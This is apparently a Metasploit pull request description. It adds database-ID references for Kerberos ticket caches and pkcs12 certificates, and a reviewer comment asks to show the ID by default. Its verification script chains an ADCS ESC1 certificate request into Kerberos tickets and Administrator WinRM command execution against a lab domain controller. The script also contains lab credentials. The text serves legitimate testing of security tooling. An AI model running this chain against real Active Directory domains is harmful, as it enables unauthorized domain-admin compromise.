Add database ref opts for kerberos and pkcs12

[adfoster-r7]

Updates modules that reference a Kerberos credential cache path or pkcs12 cert to support reading from a file on disk, or now a database id with the syntax id:123

Example:

Verification

Ensure CI passes; Ensure you can run through the workflow of using either files or database ID references as part of module options

Example resource file run with resource resource.rc on msfconsole

resource.rc

reload_lib -a
reload

<ruby>

rhost = "10.140.10.201"

def krb5ccname(value)
  # "#{value.path}"
  "id:#{value.id}"
end

# ICPR cert
run_single("use auxiliary/admin/dcerpc/icpr_cert")
run_single("run rhost=#{rhost} smbuser=sandy smbpass=vagrant smbdomain=ad.pro.local ca=mspro-dc-ad-pro-local-CA cert_template=esc1 [email protected]")

cert = framework.db.creds({ type: 'Metasploit::Credential::Pkcs12' }).last
puts "Stored pkcs12: id=#{cert.id} public=#{cert.public} cert=#{cert.private['metadata'].inspect}"

# Request TGT
run_single("use admin/kerberos/get_ticket")
run_single("rerun action=GET_TGT rhost=#{rhost} cert_file=id:#{cert.id}")

tgt = framework.db.loot({ ltype: 'mit.kerberos.ccache' }).sort_by(&:id).last
puts "Stored tgt: id=#{tgt.id} info=#{tgt.info}"

# Request TGS for winrm
run_single("use admin/kerberos/get_ticket")
run_single("run action=GET_TGS rhosts=#{rhost} Krb5Ccname=#{krb5ccname(tgt)} username=Administrator domain=ad.pro.local spn=http/mspro-dc KrbCacheMode=none")

tgs = framework.db.loot({ ltype: 'mit.kerberos.ccache' }).sort_by(&:id).last
puts "Stored tgs: id=#{tgs.id} info=#{tgs.info}"

# Verify smb_login with TGS
run_single("use auxiliary/scanner/winrm/winrm_cmd")
run_single("run rhost=#{rhost} username=Administrator domain=ad.pro.local cmd=whoami winrm::rhostname=mspro-dc domaincontrollerrhost=#{rhost} Winrm::Auth=kerberos KrbCacheMode=none winrm::krb5ccname=#{krb5ccname(tgs)}")
</ruby>

[smcintyre-r7]

Let's show the ID by default. This would align it with the klist and certs command to make it a bit more consistent.